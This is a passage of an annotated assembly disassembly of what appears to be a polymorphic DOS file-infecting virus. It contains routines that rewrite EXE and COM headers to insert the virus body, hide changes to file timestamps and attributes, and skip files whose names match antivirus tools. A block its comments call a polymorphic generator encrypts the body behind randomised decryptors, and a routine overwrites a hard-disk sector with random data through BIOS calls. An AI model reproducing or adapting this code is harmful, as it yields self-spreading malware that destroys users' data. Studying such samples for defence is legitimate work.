0565 jmp loc_ret_56 ; (05F0)
0568 loc_53: ; xref 9804:0561
0568 pop ax
0569 mov cx,word ptr data_49+2 ; (9804:017C=400h)
056D mov dx,ax
056F mov ax,4200h
0572 call sub_5 ; (02C5)
0575 mov ax,1E7Bh
0578 mov dx,[si+2]
057B add dx,ax
057D loc_54: ; xref 9804:0588
057D inc word ptr [si+4]
0580 sub dx,200h
0584 cmp dx,200h
0588 ja loc_54 ; Jump if above
058A jnz loc_55 ; Jump if not zero
058C xor dx,dx ; Zero register
058E loc_55: ; xref 9804:058A
058E mov [si+2],dx
0591 mov ax,[si+8]
0594 mov cx,10h
0597 mul cx ; dx:ax = reg * ax
0599 mov cx,data_49 ; (9804:017A=1E73h)
059D sub cx,ax
059F sbb word ptr data_49+2,dx ; (9804:017C=400h)
05A3 mov di,word ptr data_49+2 ; (9804:017C=400h)
05A7 mov si,cx
05A9 mov dx,di
05AB mov ax,si
05AD mov cx,10h
05B0 div cx ; ax,dx rem=dx:ax/reg
05B2 mov di,ax
05B4 mov si,dx
05B6 mov data_78,si ; (9804:0E6E=9)
05BA mov word ptr ds:[1],si ; (9804:0001=9)
05BE add si,1E6Ah
05C2 mov data_49,si ; (9804:017A=1E73h)
05C6 mov word ptr data_49+2,di ; (9804:017C=400h)
05CA cld ; Clear direction
05CB , mov si,offset data_49 ; (9804:017A=73h)
05CE , mov di,data_166e ; (9804:1E7E=0)
05D1 movsw ; Mov [si] to es:[di]
05D2 movsw ; Mov [si] to es:[di]
05D3 call sub_23 ;// Polymorphism (0992)
05D6 jc loc_ret_56 ; Jump if carry Set
05D8 xor cx,cx ; Zero register
05DA mov dx,cx
05DC mov ax,4200h
05DF call sub_5 ; (02C5)
05E2 call sub_44 ; (1224)
05E5 mov dx,1E6Ah
05E8 mov ah,40h ; '@'
05EA mov cx,1Ch
05ED call sub_5 ; (02C5)
05F0 loc_ret_56: ; xref 9804:04F3, 055A, 0565, 05D6
05F0 retn
sub_8 endp
;==========================================================================
; SUBROUTINE
;
; Called from: 9804:04A0, 1297
;==========================================================================
;------------------- Reloc COM header ---------------------------------
05F1 sub_9 proc near
05F1 mov data_48,0 ; (9804:0179=1)
05F6 cld ; Clear direction
05F7 mov di,16Bh
05FA mov si,1E6Ah
05FD call sub_47 ; (1346)
0600 jc loc_57 ; Jump if carry Set
0602 mov cx,3
0605 rep movsb ; Rep when cx >0 Mov [si] to es:[di]
0607 mov dx,cx
0609 mov ax,4202h
060C call sub_5 ; (02C5)
060F or dx,dx ; Zero ?
0611 jz loc_58 ; Jump if zero
0613 loc_57: ; xref 9804:0600, 0619
0613 stc ; Set carry flag
0614 jmp short loc_ret_60 ; (0668)
0616 loc_58: ; xref 9804:0611
0616 cmp ax,1Eh
0619 jb loc_57 ; Jump if below
061B xor cx,cx ; Zero register
061D mov dx,cx
061F mov ax,4202h
0622 call sub_5 ; (02C5)
0625 cmp ax,0D995h
0628 jb loc_59 ; Jump if below
062A stc ; Set carry flag
062B jmp short loc_ret_60 ; (0668)
062D loc_59: ; xref 9804:0628
062D mov data_78,ax ; (9804:0E6E=9)
0630 add data_78,100h ; (9804:0E6E=9)
0636 mov word ptr ds:[1],ax ; (9804:0001=9)
0639 add word ptr ds:[1],100h ; (9804:0001=9)
063F , mov di,offset data_41 ; (9804:0168=90h)
0642 mov byte ptr [di],0E9h
0645 sub ax,3
0648 add ax,1E6Ah
064B mov [di+1],ax
064E call sub_23 ;// Polymorphism (0992)
0651 jc loc_ret_60 ; Jump if carry Set
0653 xor cx,cx ; Zero register
0655 mov dx,cx
0657 mov ax,4200h
065A call sub_5 ; (02C5)
065D mov cx,3
0660 mov dx,168h
0663 mov ah,40h ; '@'
0665 call sub_5 ; (02C5)
0668 loc_ret_60: ; xref 9804:0614, 062B, 0651
0668 retn
sub_9 endp
;==========================================================================
; SUBROUTINE
;
; Called from: 9804:0456, 1046, 1256
;==========================================================================
0669 sub_10 proc near
0669 mov ax,5700h
066C call sub_5 ; (02C5)
066F mov cs:data_51,cx ; (9804:017E=61F7h)
0674 mov word ptr cs:data_51+2,dx ; (9804:0180=2099h)
0679 retn
sub_10 endp
;==========================================================================
; SUBROUTINE
;
; Called from: 9804:04AF, 1064, 12AD
;==========================================================================
067A sub_11 proc near
067A mov ax,5701h
067D mov cx,cs:data_51 ; (9804:017E=61F7h)
0682 mov dx,word ptr cs:data_51+2 ; (9804:0180=2099h)
0687 call sub_5 ; (02C5)
068A retn
sub_11 endp
;==========================================================================
; SUBROUTINE
;
; Called from: 9804:0434, 1010
;==========================================================================
068B sub_12 proc near
068B mov ax,4300h
068E call sub_5 ; (02C5)
0691 mov cs:data_56,cx ; (9804:0186=9804h)
0696 mov ax,4301h
0699 xor cx,cx ; Zero register
069B call sub_5 ; (02C5)
069E retn
sub_12 endp
;==========================================================================
; SUBROUTINE
;
; Called from: 9804:04B7, 106C
;==========================================================================
069F sub_13 proc near
069F mov ax,4301h
06A2 mov cx,cs:data_56 ; (9804:0186=9804h)
06A7 call sub_5 ; (02C5)
06AA retn
sub_13 endp
;==========================================================================
; SUBROUTINE
;
; Called from: 9804:0731, 1341
;==========================================================================
06AB sub_14 proc near
06AB push ds
06AC push cs
06AD pop ds
06AE cld ; Clear direction
06AF , mov si,offset data_67 ; (9804:0748='LP.EXED.COME')
06B2 sub bx,4
06B5 jc loc_61 ; Jump if carry Set
06B7 mov ax,[si]
06B9 cmp ax,4254h
06BC stc ; Set carry flag
06BD jz loc_61 ; Jump if zero
06BF cmp ax,2D46h
06C2 je loc_63 ; Jump if equal
06C4 cmp ax,5649h
06C7 je loc_63 ; Jump if equal
06C9 cmp ax,4843h
06CC je loc_62 ; Jump if equal
06CE mov al,56h ; 'V'
06D0 , mov di,offset data_67 ; (9804:0748='LP.EXED.COME')
06D3 mov cx,bx
06D5 inc cx
06D6 repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al
06D8 or cx,cx ; Zero ?
06DA stc ; Set carry flag
06DB jnz loc_61 ; Jump if not zero
06DD , mov di,offset data_67 ; (9804:0748='LP.EXED.COME')
06E0 , mov si,offset data_68 ; (9804:0755=43h)
06E3 mov cx,bx
06E5 repe cmpsb ; Rep zf=1+cx >0 Cmp [si] to es:[di]
06E7 or cx,cx ; Zero ?
06E9 stc ; Set carry flag
06EA jz loc_61 ; Jump if zero
06EC clc ; Clear carry flag
06ED loc_61: ; xref 9804:06B5, 06BD, 06DB, 06EA
06ED pop ds
06EE retn
06EF loc_62: ; xref 9804:06CC
06EF or data_59,2 ; (9804:018C=4)
06F4 pop ds
06F5 retn
06F6 loc_63: ; xref 9804:06C2, 06C7
06F6 or byte ptr ds:data_17e,1 ; (0000:018C=0)
06FB stc ; Set carry flag
06FC pop ds
06FD retn
sub_14 endp
;==========================================================================
; SUBROUTINE
;
; Called from: 9804:0437, 101C
;==========================================================================
06FE sub_15 proc near
06FE push ds
06FF pop es
0700 xor al,al ; Zero register
0702 mov di,dx
0704 xor cx,cx ; Zero register
0706 mov cl,0FFh
0708 mov bx,cx
070A cld ; Clear direction
070B repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al
070D dec di
070E dec di
070F sub bx,cx
0711 mov cx,bx
0713 std ; Set direction flag
0714 mov al,5Ch ; '\'
0716 repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al
0718 sub bx,cx
071A mov cx,bx
071C inc di
071D mov al,es:[di]
0720 cmp al,5Ch ; '\'
0722 jne loc_64 ; Jump if not equal
0724 inc di
0725 mov si,di
0727 , mov di,offset data_67 ; (9804:0748='LP.EXED.COME')
072A dec cx
072B dec bx
072C cld ; Clear direction
072D push cs
072E pop es
072F rep movsb ; Rep when cx >0 Mov [si] to es:[di]
0731 call sub_14 ; (06AB)
0734 retn
0735 loc_64: ; xref 9804:0722
0735 mov bx,0Ah
0738 push cs
0739 pop es
073A retn
sub_15 endp
073B dec sp
073C push ax
073D db '.EXE9E.EXE'
0747 db 0
0748 data_67 db 'LP.EXED.COME', 0 ; xref 9804:0441, 06AF, 06D0, 06DD
; 0727, 1030, 12F7
0755 data_68 db 43h ; xref 9804:06E0
0756 db 4Fh, 4Dh, 4Dh, 41h, 4Eh, 44h
;------- Win95's Floppy drive driver (?) -----------------------------------
075C data_69 db '\SYSTEM\IOSUBSYS\HSFLOP.PDR', 0 ; xref 9804:07C4
;==========================================================================
; SUBROUTINE
;
; Called from: 9804:0106, 04C6, 04E1
;==========================================================================
0778 sub_16 proc near
0778 push ds
0779 push dx
077A xor di,di ; Zero register
077C loc_65: ; xref 9804:07D7
077C mov cx,0FFFFh
077F mov ah,62h
0781 int 21h ; DOS Services ah=function 62h
; get Program Segment Prefix bx
0783 mov es,bx
0785 mov es,es:data_1e ; (0000:002C=6Fh)
078A cld ; Clear direction
078B loc_66: ; xref 9804:079C, 07A6
078B mov al,0
078D repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al
078F mov ax,es:[di]
0792 or al,al ; Zero ?
0794 jz loc_68 ; Jump if zero
0796 and ax,0DFDFh
0799 cmp ax,4957h
079C jne loc_66 ; Jump if not equal
079E mov al,es:[di+2]
07A2 and al,0DFh
07A4 cmp al,4Eh ; 'N'
07A6 jne loc_66 ; Jump if not equal
07A8 mov al,3Dh ; '='
07AA repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al
07AC jcxz loc_68 ; Jump if cx=0
07AE mov si,di
07B0 mov bx,di
07B2 , mov di,offset data_157 ; (9804:1E6A=98h)
07B5 mov dx,di
07B7 push es
07B8 pop ds
07B9 push cs
07BA pop es
07BB loc_67: ; xref 9804:07BF
07BB lodsb ; String [si] to al
07BC stosb ; Store al to es:[di]
07BD or al,al ; Zero ?
07BF jnz loc_67 ; Jump if not zero
07C1 dec di
07C2 push cs
07C3 pop ds
07C4 , mov si,offset data_69 ; (9804:075C='\SYSTEM\IOSUBSYS')
07C7 mov cx,1Ch
07CA rep movsb ; Rep when cx >0 Mov [si] to es:[di]
07CC mov ah,41h ; 'A'
07CE call sub_5 ; (02C5)
07D1 jnc loc_68 ; Jump if carry=0
07D3 cmp al,2
07D5 mov di,bx
07D7 jz loc_65 ; Jump if zero
07D9 stc ; Set carry flag
07DA loc_68: ; xref 9804:0794, 07AC, 07D1
07DA pop dx
07DB pop ds
07DC retn
sub_16 endp
07DD add [bp+si],bl
07DF add bl,[bp+si]
07E1 add al,1Ah
07E3 add dx,[bx+si]
07E5 or [bx+si],dl
07E7 ;* pop cs ; Dangerous-8088 only
07E7 db 0Fh
07E8 adc [bp+di],cl
07EA and [di],cx
07EC and [bx+si],bx
07EE and [bx+di],bx
07F0 and [bp+si],bp
07F2 and [si],bp
07F4 and [bx+si],si
07F6 and [di+21h],cx
07F9 push cx
07FA and [si+21h],dx
07FD db 62h, 21h, 0Bh, 21h, 0Dh, 21h
0803 data_71 dw 2BCDh ; Data table (indexed access)
; xref 9804:086C, 0E4D
0805 db 0CDh, 2Ch,0CDh, 2Dh,0CDh, 28h
080B db 0CDh, 1Ch,0CDh, 08h,0CDh, 0Ah
0811 db 0CDh, 0Bh,0CDh, 0Ch,0CDh, 0Dh
0817 db 0CDh, 0Fh,0CDh, 0Eh,0CDh, 70h
081D db 0CDh, 71h,0CDh, 72h,0CDh, 73h
0823 db 0CDh, 74h,0CDh, 75h,0CDh, 76h
0829 db 0CDh, 77h,0CDh, 01h,0CCh,0CCh
082F data_72 db 'PXS[QYRZW_V^U]' ; xref 9804:0D12
083D db 1Eh, 1Fh, 06h, 07h, 16h, 17h
0843 data_73 dw 0D442h ; xref 9804:097F, 0984
0845 data_74 db 28h ; xref 9804:0860, 0866, 087B, 0881
;==========================================================================
; SUBROUTINE
;
; Called from: 9804:08A0
;==========================================================================
0846 sub_17 proc near
0846 loc_69: ; xref 9804:0864, 087F
0846 call sub_21 ; (093A)
0849 test ah,10h
084C jz loc_72 ; Jump if zero
084E cmp bl,2
0851 je loc_70 ; Jump if equal
0853 cmp bl,4
0856 je loc_71 ; Jump if equal
0858 jmp short loc_72 ; (0897)
085A loc_70: ; xref 9804:0851, 085C
085A add al,40h ; '@'
085C jnc loc_70 ; Jump if carry=0
085E and al,0FEh
0860 cmp al,data_74 ; (9804:0845=28h)
0864 je loc_69 ; Jump if equal
0866 mov data_74,al ; (9804:0845=28h)
0869 push si
086A cbw ; Convrt byte to word
086B xchg bx,ax
086C , mov si,offset data_71 ; (9804:0803=0CDh)
086F mov ax,[bx+si]
0871 pop si
0872 mov bl,2
0874 retn
0875 loc_71: ; xref 9804:0856, 0877
0875 add al,26h ; '&'
0877 jnc loc_71 ; Jump if carry=0
0879 and al,0FEh
087B cmp al,data_74 ; (9804:0845=28h)
087F je loc_69 ; Jump if equal
0881 mov data_74,al ; (9804:0845=28h)
0884 push si
0885 cbw ; Convrt byte to word
0886 xchg bx,ax
0887 , mov si,7DDh ; (9804:07DD=0)
088A mov ah,[bx+si]
088C mov dh,[bx+si+1]
088F mov al,0B4h
0891 mov dl,0CDh
0893 pop si
0894 mov bl,4
0896 retn
0897 loc_72: ; xref 9804:084C, 0858
0897 mov bl,0
0899 retn
sub_17 endp
;==========================================================================
; SUBROUTINE
;
; Called from: 9804:0A56, 0A76, 0A9A, 0AAA, 0AB2, 0ABD, 0ACF
;==========================================================================
089A sub_18 proc near
089A mov bp,3
089D loc_73: ; xref 9804:08AD, 08B3
089D , dec bp
089E jz loc_ret_76 ; Jump if zero
08A0 call sub_17 ; (0846)
08A3 add cl,bl
08A5 cmp bl,2
08A8 jb loc_75 ; Jump if below
08AA ja loc_74 ; Jump if above
08AC stosw ; Store ax to es:[di]
08AD jmp short loc_73 ; (089D)
08AF loc_74: ; xref 9804:08AA
08AF stosw ; Store ax to es:[di]
08B0 mov ax,dx
08B2 stosw ; Store ax to es:[di]
08B3 loc_75: ; xref 9804:08A8
08B3 jmp short loc_73 ; (089D)
08B5 loc_ret_76: ; xref 9804:089E
08B5 retn
sub_18 endp
;==========================================================================
; SUBROUTINE
;
; Called from: 9804:09AC, 0E82, 146A, 14D3
;==========================================================================
08B6 sub_19 proc near
08B6 xor bx,bx ; Zero register
08B8 loc_77: ; xref 9804:08C3, 08CD
08B8 , push ax
08B9 call sub_21 ; (093A)
08BC mov bl,al
08BE pop ax
08BF mov al,bl
08C1 or bl,bl ; Zero ?
08C3 jz loc_77 ; Jump if zero
08C5 and bl,3
08C8 cmp bl,3
08CB jb loc_ret_78 ; Jump if below
08CD jmp short loc_77 ; (08B8)
08CF loc_ret_78: ; xref 9804:08CB
08CF retn
sub_19 endp
;==========================================================================
; SUBROUTINE
;
; Called from: 9804:00B2, 1729, 1E26
;==========================================================================
08D0 sub_20 proc near
08D0 push cs
08D1 push cs
08D2 pop es
08D3 pop ds
08D4 mov ah,8
08D6 mov dl,80h
08D8 int 13h ; Disk dl=drive 0 ah=func 08h
; get drive parameters, bl=type
; cx=cylinders, dh=max heads
08DA , mov bx,data_175e ; (9804:20BA=0)
08DD mov ax,201h
08E0 inc ch
08E2 dec dh
08E4 dec dh
08E6 mov cl,1
08E8 mov dl,80h
08EA int 13h ; Disk dl=drive 0 ah=func 02h
; read sectors to memory es:bx
; al=#,ch=cyl,cl=sectr,dh=head
08EC jc loc_ret_82 ; Jump if carry Set
08EE call sub_22 ; (095B)
08F1 and al,0Fh
08F3 cmp al,7
08F5 je loc_79 ; Jump if equal
08F7 cmp word ptr [bx],0CCDDh
08FB je loc_ret_82 ; Jump if equal
08FD loc_79: ; xref 9804:08F5
08FD mov cx,100h
0900 mov di,bx
0902 locloop_80: ; xref 9804:090C
0902 call sub_22 ; (095B)
0905 add ax,[di-2]
0908 mov [di],ax
090A inc di
090B inc di
090C loop locloop_80 ; Loop if cx > 0
090E mov word ptr [bx],0CCDDh
0912 loc_81: ; xref 9804:0938
0912 , mov ah,8
0914 mov dl,80h
0916 int 13h ; Disk dl=drive 0 ah=func 08h
; get drive parameters, bl=type
; cx=cylinders, dh=max heads
0918 , mov bx,data_175e ; (9804:20BA=0)
091B mov ax,301h
091E inc ch
0920 dec dh
0922 dec dh
0924 mov cl,1
0926 mov dl,80h
0928 int 13h ; Disk dl=drive 0 ah=func 03h
; write sectors from mem es:bx
; al=#,ch=cyl,cl=sectr,dh=head
092A jc loc_83 ; Jump if carry Set
092C loc_ret_82: ; xref 9804:08EC, 08FB
092C retn
092D loc_83: ; xref 9804:092A
092D mov ax,440Dh
0930 mov bx,180h
0933 mov cx,84Bh
0936 int 21h ; DOS Services ah=function 44h
; IOctl-C block device control
; bl=drive, cx=category/type
; ds:dx ptr to parameter block
0938 jmp short loc_81 ; (0912)
sub_20 endp
;==========================================================================
; SUBROUTINE
;
; Called from: 9804:0846, 08B9, 09C5, 0A7C, 0AD8, 0B1C, 0B74
; 0C1F, 0C4C, 0C6F, 0CA8, 0CC2, 0CFE, 0D3D
; 0D74, 0D8C, 0DA5, 0DB5, 0DFC, 0E30, 0E42
; 0E95, 0EC0, 0EEC, 0F1B, 0F2F, 1224, 1233
; 148E, 14C3, 14E9, 1517, 1537, 15AA, 15BC
; 15D9, 160B
;==========================================================================
093A sub_21 proc near
093A push bx
093B mov bx,cs:data_175e ; (9804:20BA=0)
0940 , cmp bx,200h ; (9804:0200=6)
0944 jb loc_84 ; Jump if below
0946 and bx,1
0949 xor bl,1
094C loc_84: ; xref 9804:0944
094C add bx,2
094F mov cs:data_175e,bx ; (9804:20BA=0)
0954 mov ax,cs:data_175e[bx] ; (9804:20BA=0)
0959 pop bx
095A retn
sub_21 endp
;==========================================================================
; SUBROUTINE
;
; Called from: 9804:08EE, 0902
;==========================================================================
095B sub_22 proc near
095B loc_85: ; xref 9804:098B, 098F
095B xor al,al ; Zero register
095D out 43h,al ; port 43h, 8253 timer control
; al = 0, latch timer0 count
095F jmp short $+2 ; delay for I/O
0961 in al,40h ; port 40h, 8253 timer 0 clock
0963 mov ah,al
0965 in al,40h ; port 40h, 8253 timer 0 clock
0967 xor al,ah
0969 xchg al,ah
096B push cx
096C mov cl,ah
096E and cl,0Fh
0971 rol ax,cl ; Rotate
0973 mov cx,ax
0975 and cx,7FFh
0979 locloop_86: ; xref 9804:097C
0979 jmp short $+2 ; delay for I/O
097B nop
097C loop locloop_86 ; Loop if cx > 0
097E pop cx
097F xor cs:data_73,ax ; (9804:0843=0D442h)
0984 add ax,cs:data_73 ; (9804:0843=0D442h)
0989 or ah,ah ; Zero ?
098B jz loc_85 ; Jump if zero
098D or al,al ; Zero ?
098F jz loc_85 ; Jump if zero
0991 retn
sub_22 endp
;==========================================================================
; SUBROUTINE
;
; Called from: 9804:05D3, 064E
;==========================================================================
;----------------------- Polymorphic Generator ----------------------
0992 sub_23 proc near
0992 push si
0993 push bx
0994 cld ; Clear direction
0995 mov word ptr ds:data_175e,0 ; (9804:20BA=0)
099B xor si,si ; Zero register
099D mov di,1E86h
09A0 mov word ptr ds:[0E6Ch],1C6Ah ; (9804:0E6C=0E6Ah)
09A6 mov ax,data_78 ; (9804:0E6E=9)
09A9 mov data_84,ax ; (9804:0E76=9)
09AC call sub_19 ; (08B6)
09AF mov al,data_114[bx] ; (9804:0FD2=30h)
09B3 mov ah,0E0h
09B5 mov word ptr ds:[0A01h],ax ; (9804:0A01=0E028h)
09B8 mov word ptr ds:[9E3h],ax ; (9804:09E3=0E028h)
09BB xor bl,3
09BE mov al,data_114[bx] ; (9804:0FD2=30h)
09C2 mov byte ptr ds:[0E7Ah],al ; (9804:0E7A=0)
09C5 call sub_21 ; (093A)
09C8 mov byte ptr ds:[0F5Dh],al ; (9804:0F5D=64h)
09CB mov byte ptr ds:[24h],al ; (9804:0024=0A9h)
09CE mov data_82,ah ; (9804:0E74=2Dh)
09D2 pop bx
09D3 push bx
09D4 mov word ptr ds:[0Dh],0F72Eh ; (9804:000D=0F72Eh)
09DA mov byte ptr ds:[0Fh],15h ; (9804:000F=15h)
09DF mov cx,14h
09E2 locloop_87: ; xref 9804:09E6
09E2 lodsb ; String [si] to al
09E3 sub al,ah
09E5 stosb ; Store al to es:[di]
09E6 loop locloop_87 ; Loop if cx > 0
09E8 mov cx,1ECh
09EB locloop_88: ; xref 9804:0A04, 0A1E, 0A2C
09EB , lodsb ; String [si] to al
09EC cmp si,1A3h
09F0 jb loc_89 ; Jump if below
09F2 xchg byte ptr ds:[0F5Dh],ah ; (9804:0F5D=64h)
09F6 xor al,ah
09F8 add ah,1
09FB xchg byte ptr ds:[0F5Dh],ah ; (9804:0F5D=64h)
09FF loc_89: ; xref 9804:09F0
09FF not al
0A01 sub al,ah
0A03 stosb ; Store al to es:[di]
0A04 loop locloop_88 ; Loop if cx > 0
0A06 call sub_38 ; (0E53)
0A09 jc loc_92 ; Jump if carry Set
0A0B mov cx,word ptr ds:[0E6Ch] ; (9804:0E6C=0E6Ah)
0A0F jcxz loc_91 ; Jump if cx=0
0A11 sub cx,200h
0A15 jc loc_90 ; Jump if carry Set
0A17 mov word ptr ds:[0E6Ch],cx ; (9804:0E6C=0E6Ah)
0A1B mov cx,200h
0A1E jmp short locloop_88 ; (09EB)
0A20 loc_90: ; xref 9804:0A15
0A20 add cx,200h
0A24 mov word ptr ds:[0E6Ch],0 ; (9804:0E6C=0E6Ah)
0A2A mov dx,cx
0A2C jmp short locloop_88 ; (09EB)
0A2E loc_91: ; xref 9804:0A0F
0A2E call sub_39 ; (0E81)
0A31 call sub_31 ; (0CA4)
0A34 call sub_24 ; (0A47)
0A37 mov dx,1F6Ah
0A3A mov ah,40h ; '@'
0A3C add cx,11h
0A3F nop
0A40 call sub_5 ; (02C5)
0A43 clc ; Clear carry flag
0A44 loc_92: ; xref 9804:0A09
0A44 pop bx
0A45 pop si
0A46 retn
sub_23 endp
;==========================================================================
; SUBROUTINE
;
; Called from: 9804:0A34
;==========================================================================
0A47 sub_24 proc near
0A47 push bx
0A48 push bp
0A49 mov si,1E86h
0A4C mov di,1F6Ah
0A4F xor cx,cx ; Zero register
0A51 call sub_32 ; (0CFE)
0A54 mov bl,4
0A56 call sub_18 ; (089A)
0A59 call sub_34 ; (0DA5)
0A5C call sub_36 ; (0E29)
0A5F call sub_29 ; (0C1F)
0A62 call sub_25 ; (0B06)
0A65 call sub_29 ; (0C1F)
0A68 call sub_25 ; (0B06)
0A6B call sub_29 ; (0C1F)
0A6E call sub_25 ; (0B06)
0A71 call sub_29 ; (0C1F)
0A74 mov bl,2
0A76 call sub_18 ; (089A)
0A79 call sub_29 ; (0C1F)
0A7C call sub_21 ; (093A)
0A7F cmp ah,80h
0A82 jb loc_93 ; Jump if below
0A84 movsb ; Mov [si] to es:[di]
0A85 jmp short loc_94 ; (0A90)
0A87 loc_93: ; xref 9804:0A82
0A87 or data_59,10h ; (9804:018C=4)
0A8C sub cl,1
0A8F inc si
0A90 loc_94: ; xref 9804:0A85
0A90 call sub_29 ; (0C1F)
0A93 call sub_28 ; (0BD2)
0A96 mov ch,cl
0A98 mov bl,2
0A9A call sub_18 ; (089A)
0A9D call sub_29 ; (0C1F)
0AA0 movsw ; Mov [si] to es:[di]
0AA1 movsb ; Mov [si] to es:[di]
0AA2 call sub_29 ; (0C1F)
0AA5 call sub_33 ; (0D35)
0AA8 mov bl,2
0AAA call sub_18 ; (089A)
0AAD call sub_27 ; (0B74)
0AB0 mov bl,2
0AB2 call sub_18 ; (089A)
0AB5 call sub_29 ; (0C1F)
0AB8 call sub_26 ; (0B1C)
0ABB mov bl,2
0ABD call sub_18 ; (089A)
0AC0 call sub_29 ; (0C1F)
0AC3 mov al,cl
0AC5 sub al,ch
0AC7 mov ch,al
0AC9 lodsw ; String [si] to ax
0ACA sub ah,ch
0ACC stosw ; Store ax to es:[di]
0ACD mov bl,2
0ACF call sub_18 ; (089A)
0AD2 call sub_29 ; (0C1F)
0AD5 call sub_30 ; (0C68)
0AD8 call sub_21 ; (093A)
0ADB and al,7
0ADD add cl,al
0ADF mov ch,0
0AE1 cmp data_48,ch ; (9804:0179=1)
0AE5 je loc_95 ; Jump if equal
0AE7 add data_159,cx ; (9804:1E6C=4E2Dh)
0AEB cmp data_159,200h ; (9804:1E6C=4E2Dh)
0AF1 jb loc_95 ; Jump if below
0AF3 inc data_161 ; (9804:1E6E=2417h)
0AF7 sub data_159,200h ; (9804:1E6C=4E2Dh)
0AFD jnz loc_95 ; Jump if not zero
0AFF dec data_161 ; (9804:1E6E=2417h)
0B03 loc_95: ; xref 9804:0AE5, 0AF1, 0AFD
0B03 pop bp
0B04 pop bx
0B05 retn
sub_24 endp
;==========================================================================
; SUBROUTINE
;
; Called from: 9804:0A62, 0A68, 0A6E
;==========================================================================
0B06 sub_25 proc near
0B06 push cx
0B07 xor cx,cx ; Zero register
0B09 mov al,byte ptr ds:[0F5Bh] ; (9804:0F5B=0)
0B0C mov cl,al
0B0E shr al,1 ; Shift w/zeros fill
0B10 shr al,1 ; Shift w/zeros fill
0B12 mov byte ptr ds:[0F5Bh],al ; (9804:0F5B=0)
0B15 and cl,3
0B18 rep movsb ; Rep when cx >0 Mov [si] to es:[di]
0B1A pop cx
0B1B retn
sub_25 endp
;==========================================================================
; SUBROUTINE
;
; Called from: 9804:0AB8
;==========================================================================
0B1C sub_26 proc near
0B1C call sub_21 ; (093A)
0B1F cmp byte ptr data_97,4 ; (9804:0F60=7)
0B24 jae loc_96 ; Jump if above or =
0B26 xor al,ah
0B28 jp loc_96 ; Jump if parity=1
0B2A movsb ; Mov [si] to es:[di]
0B2B retn
0B2C loc_96: ; xref 9804:0B24, 0B28
0B2C mov bl,data_96 ; (9804:0F5F=3)
0B30 mov bh,0
0B32 cmp byte ptr data_97,6 ; (9804:0F60=7)
0B37 jae loc_98 ; Jump if above or =
0B39 cmp byte ptr data_97,4 ; (9804:0F60=7)
0B3E jae loc_97 ; Jump if above or =
0B40 test al,1
0B42 jnz loc_98 ; Jump if not zero
0B44 loc_97: ; xref 9804:0B3E
0B44 mov dl,1
0B46 mov dh,data_108[bx] ; (9804:0F98=0E8h)
0B4A jmp short loc_99 ; (0B52)
0B4C loc_98: ; xref 9804:0B37, 0B42
0B4C mov dl,0FFh
0B4E mov dh,data_109[bx] ; (9804:0F9F=0C0h)
0B52 loc_99: ; xref 9804:0B4A
0B52 test al,2
0B54 jnz loc_100 ; Jump if not zero
0B56 mov al,81h
0B58 stosb ; Store al to es:[di]
0B59 mov al,dh
0B5B stosb ; Store al to es:[di]
0B5C mov al,dl
0B5E cbw ; Convrt byte to word
0B5F stosw ; Store ax to es:[di]
0B60 inc si
0B61 add cl,3
0B64 retn
0B65 loc_100: ; xref 9804:0B54
0B65 mov al,83h
0B67 stosb ; Store al to es:[di]
0B68 mov al,dh
0B6A stosb ; Store al to es:[di]
0B6B mov al,dl
0B6D stosb ; Store al to es:[di]
0B6E inc si
0B6F add cl,2
0B72 retn
sub_26 endp
0B73 retn
;==========================================================================
; SUBROUTINE
;
; Called from: 9804:0AAD, 1559
;==========================================================================
0B74 sub_27 proc near
0B74 call sub_21 ; (093A)
0B77 xor al,ah
0B79 jns loc_101 ; Jump if not sign
0B7B movsb ; Mov [si] to es:[di]
0B7C retn
0B7D loc_101: ; xref 9804:0B79
0B7D mov bl,byte ptr ds:[0F5Dh] ; (9804:0F5D=64h)
0B81 mov bh,0
0B83 cmp byte ptr ds:[0F5Ch],80h ; (9804:0F5C=0FFh)
0B88 nop
0B89 ja loc_103 ; Jump if above
0B8B test al,1
0B8D jnz loc_102 ; Jump if not zero
0B8F mov dl,1
0B91 mov dh,data_108[bx] ; (9804:0F98=0E8h)
0B95 jmp short loc_105 ; (0BB1)
0B97 loc_102: ; xref 9804:0B8D
0B97 mov dl,0FFh
0B99 mov dh,data_109[bx] ; (9804:0F9F=0C0h)
0B9D jmp short loc_105 ; (0BB1)
0B9F loc_103: ; xref 9804:0B89
0B9F test al,1
0BA1 jnz loc_104 ; Jump if not zero
0BA3 mov dl,1
0BA5 mov dh,data_109[bx] ; (9804:0F9F=0C0h)
0BA9 jmp short loc_105 ; (0BB1)
0BAB loc_104: ; xref 9804:0BA1
0BAB mov dl,0FFh
0BAD mov dh,data_108[bx] ; (9804:0F98=0E8h)
0BB1 loc_105: ; xref 9804:0B95, 0B9D, 0BA9
0BB1 test al,2
0BB3 jnz loc_106 ; Jump if not zero
0BB5 mov al,81h
0BB7 stosb ; Store al to es:[di]
0BB8 mov al,dh
0BBA stosb ; Store al to es:[di]
0BBB mov al,dl
0BBD cbw ; Convrt byte to word
0BBE stosw ; Store ax to es:[di]
0BBF inc si
0BC0 add cl,3
0BC3 retn
0BC4 loc_106: ; xref 9804:0BB3
0BC4 mov al,83h
0BC6 stosb ; Store al to es:[di]
0BC7 mov al,dh
0BC9 stosb ; Store al to es:[di]
0BCA mov al,dl
0BCC stosb ; Store al to es:[di]
0BCD inc si
0BCE add cl,2
0BD1 retn
sub_27 endp
;==========================================================================
; SUBROUTINE
;
; Called from: 9804:0A93
;==========================================================================
0BD2 sub_28 proc near
0BD2 cmp byte ptr ds:[0F5Ch],80h ; (9804:0F5C=0FFh)
0BD7 nop
0BD8 ja loc_ret_110 ; Jump if above
0BDA push dx
0BDB mov dx,1E6Ah
0BDE mov al,byte ptr ds:[0F5Ch] ; (9804:0F5C=0FFh)
0BE1 and al,7
0BE3 cbw ; Convrt byte to word
0BE4 inc ax
0BE5 add dx,ax
0BE7 mov bl,data_97 ; (9804:0F60=7)
0BEB cmp bl,6
0BEE je loc_107 ; Jump if equal
0BF0 test bl,1
0BF3 jnz loc_107 ; Jump if not zero
0BF5 dec dx
0BF6 loc_107: ; xref 9804:0BEE, 0BF3
0BF6 mov ah,al
0BF8 xor bx,bx ; Zero register
0BFA mov bl,byte ptr ds:[0F5Dh] ; (9804:0F5D=64h)
0BFE mov al,81h
0C00 stosb ; Store al to es:[di]
